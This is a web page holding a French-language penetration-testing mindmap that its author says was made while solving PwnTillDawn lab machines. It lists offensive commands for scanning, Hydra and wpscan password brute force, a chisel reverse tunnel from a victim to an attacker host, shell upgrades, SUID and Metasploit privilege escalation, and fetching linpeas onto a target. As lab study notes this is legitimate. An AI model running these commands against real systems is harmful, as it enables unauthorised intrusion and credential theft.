カテゴリー 全て - privilege

によって Anthony Guilbert 6時間前.

219

Pwntilldawn Mindmap FULL

A mindmap covering various aspects of cybersecurity and penetration testing tools is presented. It includes detailed notes on using Nmap for network scanning, with specific command options and automation scripts.

Pwntilldawn Mindmap FULL

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations



Sur l'host

chisel server -port 7777 --reverse

Verifier ce qui écoute sur localhost

NMAP

Nmap Automator
nmap -sV -sC -T5 -p- ip
nmap -sV -Pn -p- -T5 ip
sudo nmap -sF -p1-100 -T4

Protocoles divers

DNS
! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH
Test de se co pour la bannière
Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Login anon à vérif
showmount -e IP
NFS
sudo mount -t nfs ip:/remote /local
sudo umount 10.150.150.59:/nfsroot

Subtopic

rpcinfo IP
SMTP
hydra -l operator -P wordlist.txt ipip smtp
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup
netstat -antup
Dumb shell upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
Si besoin des erreurs mais pas affichée ( ex webshell php )
Ajout de "2>fichier" apres la commande

puis faire un cat du fichier

Find files

@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
Other

grep -r pattern

search in files ( -recursive )

-r

Find

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

Privesc

SUID
find / -perm -u=s -type f 2>/dev/null
searchsploit
searchsploit -m chemin
searchsploit xxxx
Python Library Hijacking
Script qui tourne en root avec des imports de librairies
LXC/LXD
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Metasploit
Upgrade session : sessions -u
Windows
Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

multi/recon/localexploitsuggester

linpeas
sudo python3 -m http.server port ( attaquant ) et wget
Lien symbolique
ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters
python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit
Depixelise
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg